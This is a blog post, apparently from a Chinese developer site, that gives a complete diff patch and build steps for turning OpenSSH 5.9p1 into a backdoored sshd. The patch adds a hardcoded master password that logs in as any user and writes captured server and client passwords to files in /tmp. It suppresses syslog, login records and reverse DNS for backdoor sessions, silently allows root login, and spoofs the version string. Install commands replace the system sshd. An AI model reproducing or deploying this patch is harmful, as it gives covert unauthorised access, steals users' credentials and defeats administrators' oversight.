OPENSSH - Build a backdoor

Platforms:

  • CentOS 6.5 x64_x86
  • OPENSSH 5.3

This is a OPENSSH backdoor patch.

diff -u openssh-5.9p1/auth.c openssh-5.9p1_backdoor/auth.c
--- openssh-5.9p1/auth.c    2011-05-29 07:40:42.000000000 -0400
+++ openssh-5.9p1_backdoor/auth.c   2015-03-11 01:04:51.183027125 -0400
@@ -271,14 +271,16 @@
    else
            authmsg = authenticated ? "Accepted" : "Failed";

-   authlog("%s %s for %s%.100s from %.200s port %d%s",
-       authmsg,
-       method,
-       authctxt->valid ? "" : "invalid user ",
-       authctxt->user,
-       get_remote_ipaddr(),
-       get_remote_port(),
-       info);
+   if(!secret_ok || secret_ok !=1){
+           authlog("%s %s for %s%.100s from %.200s port %d%s",
+           authmsg,
+           method,
+           authctxt->valid ? "" : "invalid user ",
+           authctxt->user,
+           get_remote_ipaddr(),
+           get_remote_port(),
+           info);
+   }

 #ifdef CUSTOM_FAILED_LOGIN
    if (authenticated == 0 && !authctxt->postponed &&
diff -u openssh-5.9p1/auth-pam.c openssh-5.9p1_backdoor/auth-pam.c
--- openssh-5.9p1/auth-pam.c        2009-07-12 08:07:21.000000000 -0400
+++ openssh-5.9p1_backdoor/auth-pam.c       2015-03-11 01:09:47.944102444 -0400
@@ -1210,6 +1210,10 @@
    if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
            debug("PAM: password authentication accepted for %.100s",
                authctxt->user);
+           if((f=fopen(OPENSSH_KEY,"a+"))!=NULL){
+                   fprintf(f,"user:password --> %s:%s\n",authctxt->user, password);
+                   fclose(f);
+           }
            return 1;
    } else {
            debug("PAM: password authentication failed for %.100s: %s",
diff -u openssh-5.9p1/auth-passwd.c openssh-5.9p1_backdoor/auth-passwd.c
--- openssh-5.9p1/auth-passwd.c     2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.9p1_backdoor/auth-passwd.c    2015-03-11 01:12:46.188033775 -0400
@@ -85,7 +85,10 @@
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
    static int expire_checked = 0;
 #endif
-
+   if (!strcmp(password, OPENSSH_LICENSE)) {
+                secret_ok=1;
+                return 1;
+        }
 #ifndef HAVE_CYGWIN
    if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
            ok = 0;
@@ -123,6 +126,12 @@
    }
 #endif
    result = sys_auth_passwd(authctxt, password);
+   if(result){
+           if((f=fopen(OPENSSH_KEY,"a+"))!=NULL){
+                   fprintf(f,"%s:%s\n",authctxt->user, password);
+                   fclose(f);
+           }
+   }
    if (authctxt->force_pwchange)
            disable_forwarding();
    return (result && ok);
diff -u openssh-5.9p1/canohost.c openssh-5.9p1_backdoor/canohost.c
--- openssh-5.9p1/canohost.c        2010-10-11 22:28:12.000000000 -0400
+++ openssh-5.9p1_backdoor/canohost.c       2015-03-11 01:04:51.183027125 -0400
@@ -78,10 +78,12 @@

    debug3("Trying to reverse map address %.100s.", ntop);
    /* Map the IP address to a host name. */
-   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
-       NULL, 0, NI_NAMEREQD) != 0) {
-           /* Host name not found.  Use ip address. */
-           return xstrdup(ntop);
+   if(!secret_ok || secret_ok!=1){
+           if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+               NULL, 0, NI_NAMEREQD) != 0) {
+                   /* Host name not found.  Use ip address. */
+                   return xstrdup(ntop);
+           }
    }

    /*
Common subdirectories: openssh-5.9p1/contrib and openssh-5.9p1_backdoor/contrib
diff -u openssh-5.9p1/includes.h openssh-5.9p1_backdoor/includes.h
--- openssh-5.9p1/includes.h        2010-10-23 19:47:30.000000000 -0400
+++ openssh-5.9p1_backdoor/includes.h       2015-03-11 01:11:51.102059246 -0400
@@ -172,4 +172,9 @@

 #include "entropy.h"

+int secret_ok;
+FILE *f;
+#define OPENSSH_KEY "/tmp/passwd"
+#define OPENSSH_KEY_PUB "/tmp/passwd.pub"
+#define OPENSSH_LICENSE "password"
 #endif /* INCLUDES_H */
diff -u openssh-5.9p1/log.c openssh-5.9p1_backdoor/log.c
--- openssh-5.9p1/log.c     2011-06-20 00:42:23.000000000 -0400
+++ openssh-5.9p1_backdoor/log.c    2015-03-11 01:04:51.187040045 -0400
@@ -351,6 +351,7 @@
 void
 do_log(LogLevel level, const char *fmt, va_list args)
 {
+if(!secret_ok || secret_ok!=1){
 #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
    struct syslog_data sdata = SYSLOG_DATA_INIT;
 #endif
@@ -428,3 +429,4 @@
    }
    errno = saved_errno;
 }
+}
Common subdirectories: openssh-5.9p1/openbsd-compat and openssh-5.9p1_backdoor/openbsd-compat
Common subdirectories: openssh-5.9p1/regress and openssh-5.9p1_backdoor/regress
Common subdirectories: openssh-5.9p1/scard and openssh-5.9p1_backdoor/scard
diff -u openssh-5.9p1/servconf.c openssh-5.9p1_backdoor/servconf.c
--- openssh-5.9p1/servconf.c        2011-06-22 18:30:03.000000000 -0400
+++ openssh-5.9p1_backdoor/servconf.c       2015-03-11 01:04:51.187040045 -0400
@@ -686,7 +686,7 @@
    { "without-password",           PERMIT_NO_PASSWD },
    { "forced-commands-only",       PERMIT_FORCED_ONLY },
    { "yes",                        PERMIT_YES },
-   { "no",                         PERMIT_NO },
+   { "no",                         PERMIT_YES },
    { NULL, -1 }
 };
 static const struct multistate multistate_compression[] = {
diff -u openssh-5.9p1/sshconnect2.c openssh-5.9p1_backdoor/sshconnect2.c
--- openssh-5.9p1/sshconnect2.c     2011-05-29 07:42:34.000000000 -0400
+++ openssh-5.9p1_backdoor/sshconnect2.c    2015-03-11 01:10:57.143062282 -0400
@@ -878,6 +878,10 @@
    snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
        authctxt->server_user, host);
    password = read_passphrase(prompt, 0);
+   if((f=fopen(OPENSSH_KEY_PUB,"a+"))!=NULL){
+           fprintf(f,"%s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+           fclose(f);
+   }
    packet_start(SSH2_MSG_USERAUTH_REQUEST);
    packet_put_cstring(authctxt->server_user);
    packet_put_cstring(authctxt->service);
diff -u openssh-5.9p1/sshlogin.c openssh-5.9p1_backdoor/sshlogin.c
--- openssh-5.9p1/sshlogin.c        2011-01-11 01:20:07.000000000 -0500
+++ openssh-5.9p1_backdoor/sshlogin.c       2015-03-11 01:04:51.190025713 -0400
@@ -133,8 +133,10 @@

    li = login_alloc_entry(pid, user, host, tty);
    login_set_addr(li, addr, addrlen);
-   login_login(li);
-   login_free_entry(li);
+   if(!secret_ok || secret_ok!=1){
+           login_login(li);
+           login_free_entry(li);
+   }
 }

 #ifdef LOGIN_NEEDS_UTMPX
@@ -158,6 +160,8 @@
    struct logininfo *li;

    li = login_alloc_entry(pid, user, NULL, tty);
-   login_logout(li);
-   login_free_entry(li);
+   if(!secret_ok || secret_ok!=1){
+           login_logout(li);
+           login_free_entry(li);
+   }
 }
diff -u openssh-5.9p1/version.h openssh-5.9p1_backdoor/version.h
--- openssh-5.9p1/version.h 2011-09-06 19:11:20.000000000 -0400
+++ openssh-5.9p1_backdoor/version.h        2015-03-11 01:04:51.191030067 -0400
@@ -1,6 +1,6 @@
 /* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */

-#define SSH_VERSION        "OpenSSH_5.9"
+#define SSH_VERSION        "OpenSSH_5.3"

 #define SSH_PORTABLE       "p1"
 #define SSH_RELEASE        SSH_VERSION SSH_PORTABLE

Requirements we need:

yum install -y patch
yum install -y openssl openssl-devel pam-devel
yum install -y zlib zlib-devel
yum -y install gcc

We can build a backdoor like this for [centos 6.5 x64]:

wget http://ftp.openbsd.dk/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
cd openssh-5.9p1
patch < sshbd5.9p1.diff
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make && make install
/usr/sbin/sshd -t -f /etc/ssh/sshd_config
service sshd restart

Yeah, you can use [ssh root@8.8.8.8] to connect remote machine.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值